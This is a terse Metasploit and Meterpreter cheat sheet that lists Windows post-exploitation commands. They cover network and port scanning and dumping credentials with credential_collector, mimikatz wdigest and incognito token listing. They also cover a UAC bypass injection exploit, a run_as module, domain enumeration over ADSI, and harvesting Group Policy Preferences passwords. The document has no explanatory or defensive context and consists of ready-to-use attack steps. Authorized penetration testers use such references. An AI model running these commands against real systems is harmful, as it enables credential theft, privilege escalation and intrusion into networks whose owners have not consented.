Metasploit

Meterpreter

Arp Scan

run arp_scanner -r <iP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering

run post/windows/gather/credentials/credential_collector
load mimikatz
wdigest
load incognito
list_tokens -u

Windows

# Collect a load of info
run winenum
# Show privs
run post/windows/gather/win_privs
# Run as
use exploit/windows/local/run_as
# Bypass UAC
use exploit/windows/local/bypassuac_injection
# Enumeration ADSI
load extapi
help extapi
adsi_computer_enum domainname
# GPP
use post/windows/gather/credentials/gpp